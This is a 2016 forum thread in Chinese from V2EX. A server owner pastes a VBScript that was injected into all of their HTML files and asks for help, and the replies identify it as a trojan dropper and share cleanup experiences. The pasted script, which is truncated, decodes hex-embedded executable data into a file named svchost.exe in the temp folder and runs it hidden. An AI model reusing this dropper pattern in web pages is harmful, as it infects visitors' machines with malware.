blakefan
V2EX  ›  服务器

大早上,发现服务器被人攻击了,所有的 html 都被植入了一段 vbscript

  •  
  •   blakefan · Jan 12, 2016 · 6309 views
    This topic created in 3785 days ago, the information mentioned may be changed or developed.

    <SCRIPT Language=VBScript><!--
    DropFileName = "svchost.exe"
    WriteData = "4D5A900003000000
    DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
    If FSO.FileExists(DropPath)=False Then
    Set FileObj = FSO.CreateTextFile(DropPath, True)
    For i = 1 To Len(WriteData) Step 2
    FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
    Next
    FileObj.Close
    End If
    Set WSHshell = CreateObject("WScript.Shell")
    WSHshell.Run DropPath, 0
    //--></SCRIPT>

    安全不懂啊,懂的 v 友指教一下

    13 replies    2016-01-29 16:13:57 +08:00
    zhanglp888
        1
    zhanglp888  
       Jan 12, 2016
    hicdn
        2
    hicdn  
       Jan 12, 2016
    这个是在服务器上看到的还是在浏览器里看到的
    akafeng
        3
    akafeng  
       Jan 12, 2016
    这是运行一个文件, svchost.exe, 目测是木马
    bigtan
        4
    bigtan  
       Jan 12, 2016
    中过这个病毒
    Moker
        5
    Moker  
       Jan 12, 2016
    前段时间同事中过,会感染所有的.html 文件后缀,然后重装....不重装好像麻烦点
    hienchu
        6
    hienchu  
       Jan 12, 2016 via iPhone
    怎么被入侵的?
    ibcker
        7
    ibcker  
       Jan 12, 2016
    等下会不会有人发帖:今天攻击了一个网站,所有的 html 都被植入了一段 vbscript
    am241
        8
    am241  
       Jan 12, 2016
    这种病毒十年前就不好用了吧
    billyu
        9
    billyu  
       Jan 12, 2016
    我前几天自己电脑也中了 然后用 360 国际版在安全模式下全盘杀毒搞定的 win7
    maskerTUI
        10
    maskerTUI  
       Jan 12, 2016
    visonme
        11
    visonme  
       Jan 12, 2016
    https://www.abuse.ch/?p=2842

    对你了解这种类别的病毒有帮助
    blakefan
        12
    blakefan  
    OP
       Jan 12, 2016
    网页木马程序
    prondtoo
        13
    prondtoo  
       Jan 29, 2016
    刚弄好 nexpose ,有需要可以帮你扫一下。
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   2695 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 71ms · UTC 15:41 · PVG 23:41 · LAX 08:41 · JFK 11:41
    ♥ Do have faith in what you're doing.